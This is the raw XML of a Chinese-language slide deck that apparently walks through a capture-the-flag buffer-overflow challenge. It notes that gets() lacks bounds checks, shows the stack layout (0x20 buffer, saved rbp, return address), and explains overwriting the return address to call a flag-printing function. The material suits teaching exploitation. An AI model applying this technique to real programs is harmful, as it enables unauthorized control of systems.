              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DB18C1-273E-4D60-B2DA-BED1F54971CA}"/>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76624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0234AE-5D11-4B04-9070-8A0A8B1E24AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>題目</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A847B3-7EF1-4BF7-8423-39AE6484F7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408778" y="1792936"/>
            <a:ext cx="5372362" cy="4962618"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C95310-981D-44C6-9960-A3701421EBAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408778" y="2473853"/>
            <a:ext cx="3595704" cy="82784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箭號: 向右 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B706A26-4DDC-46A0-9266-0CC83A6AC99C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7004482" y="2765393"/>
            <a:ext cx="1535837" cy="257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8B66FF21-6DC1-41B6-8DA9-FEB9966454B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8646850" y="2473853"/>
            <a:ext cx="3329127" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行這個函數後就可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案的內容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D246B6-05D2-41DC-93E5-AB464B6C721A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3481279" y="4531606"/>
            <a:ext cx="2120531" cy="2788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右 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17612625-D54B-46EB-8FE3-C344FF00B5A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655637" y="4531606"/>
            <a:ext cx="1535837" cy="257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139E53DD-FF45-4933-A9B7-9E0717912A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7170403" y="4347865"/>
            <a:ext cx="3329127" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可以蓋掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>位元，要想辦法呼叫上面的函數來完成這一題</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196769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F391F-4FEC-462C-A614-BD82D29BB7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式行為分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32650F16-C8DC-40D9-8DEA-E7F21AD2454B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="2044821"/>
            <a:ext cx="5106113" cy="695422"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3493472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68702C-BAC5-459E-A6FE-B52DB772A3D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>逆向分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" cap="none" dirty="0"/>
              <a:t>-radare2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72575F05-4E76-4DB5-9C4F-D4017C8E8B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361972" y="2011363"/>
            <a:ext cx="5466468" cy="4206875"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABCBEF2-3AFA-4CFE-86C3-65E8F7025603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361972" y="4500979"/>
            <a:ext cx="4015372" cy="1686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86B7B415-B8E8-4B60-9566-790CFE6BDB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361972" y="5066544"/>
            <a:ext cx="4015372" cy="1686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箭號: 向右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999EEC0B-56C2-4D77-A901-7F7E90FDE89D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7377344" y="4500978"/>
            <a:ext cx="1451096" cy="16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箭號: 向右 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93085891-4564-41A0-A5F0-463AB9D2DC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7377344" y="5066543"/>
            <a:ext cx="1451096" cy="16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D0713F2C-0E42-41E9-A4E9-B3BF28257BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8939814" y="4500978"/>
            <a:ext cx="3045040" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>題目中有使用到兩個函數</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3297332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7D7B961-DCC5-4893-8150-E6ACEC204421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8442664" y="0"/>
            <a:ext cx="3749336" cy="4869402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6594B0D8-9470-4857-9B18-C9A5B36700E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8442662" y="4869402"/>
            <a:ext cx="3749337" cy="1988598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4BA880-5149-4978-921D-11201D67CFB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3087931" y="127365"/>
            <a:ext cx="2286319" cy="476316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="箭號: 向右 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44CBDB9-D7E5-45BB-ADD0-AE88DC69AB4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5566298" y="241236"/>
            <a:ext cx="2533095" cy="248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53E5CE2F-8928-4706-BF85-EEA7A31991B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8540316" y="489811"/>
            <a:ext cx="2450239" cy="18489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右 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0760FEE-5742-4B75-9DF3-D08ECC246C80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9416590" flipV="1">
            <a:off x="5046424" y="1188730"/>
            <a:ext cx="3471360" cy="322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2C1B644F-3442-4300-A16A-CAF9A00DD338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8499513" y="5107679"/>
            <a:ext cx="1461234" cy="106230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箭號: 向右 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F44D4C-66FA-4265-9268-2DCFD497E26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9631028" y="5514542"/>
            <a:ext cx="659437" cy="248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B528D236-1076-4C0D-80FB-B8C22A2CCF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10424613" y="5108365"/>
            <a:ext cx="1303519" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可以進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="箭號: 向右 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CA6FC5-30D7-4776-8B1D-A7A448D95767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968971" y="2178030"/>
            <a:ext cx="1473296" cy="97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箭號: 向右 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B23197B2-DABD-43BD-84AF-5F3B62626184}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968971" y="3392440"/>
            <a:ext cx="1473295" cy="97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箭號: 向右 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375A36C2-BE10-47EE-94ED-FDF00C4D7A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968970" y="4091013"/>
            <a:ext cx="1473296" cy="97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箭號: 向右 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E040460-D3EE-4DFB-8F68-16D3CF5ECD9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6940941" y="6003996"/>
            <a:ext cx="1473296" cy="97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右 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA59538-77A0-4B84-B7CD-E21C442A791E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6955154" y="4950072"/>
            <a:ext cx="1473296" cy="97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2" name="群組 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1582895D-C42A-4869-9054-B7F37495841F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1890944" y="1271771"/>
            <a:ext cx="3483306" cy="2846253"/>
            <a:chOff x="1890944" y="1271771"/>
            <a:chExt cx="3483306" cy="2846253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="群組 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26AF0998-FCE8-41DD-9A81-16720F3B4304}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3195592" y="1271771"/>
              <a:ext cx="2178658" cy="2846253"/>
              <a:chOff x="1870947" y="2325642"/>
              <a:chExt cx="2178658" cy="2846253"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06802F96-446E-4013-9746-5068A5DA27D8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1870948" y="4543742"/>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RETURN ADDRESS</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="矩形 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF67820-031A-4FA5-8D11-073B1A06FF1E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1870948" y="3870357"/>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Saved </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                  <a:t>rbp</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="矩形 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E8B894-B4E3-452F-8CDC-BE882B2EE8AC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1870947" y="2325642"/>
                <a:ext cx="2178657" cy="14994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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="文字方塊 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A583495-D92C-40DD-A1FE-83161018D5A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2436171" y="1836846"/>
              <a:ext cx="1303519" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x20</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="文字方塊 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28D98BE-DC9B-4E67-BC1C-9330CDBEF506}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2610035" y="2913257"/>
              <a:ext cx="1303519" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x8</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="直線接點 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB9D3950-0859-44AB-BD29-90800DCC91E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1890944" y="1271771"/>
              <a:ext cx="1304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BF23D45B-2AC4-4570-BC15-DF45DFC6DBC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1890944" y="2766120"/>
              <a:ext cx="1304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DF629FB9-6DA3-424C-8E99-B2D477EDA3E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1890944" y="3441156"/>
              <a:ext cx="130464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文字方塊 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E41B9F16-66B9-499D-A9FF-004D7099B042}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9691644" y="6507434"/>
            <a:ext cx="2597822" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函數沒有檢查邊界</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC39B644-0B88-443B-87BE-DBAE089714E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
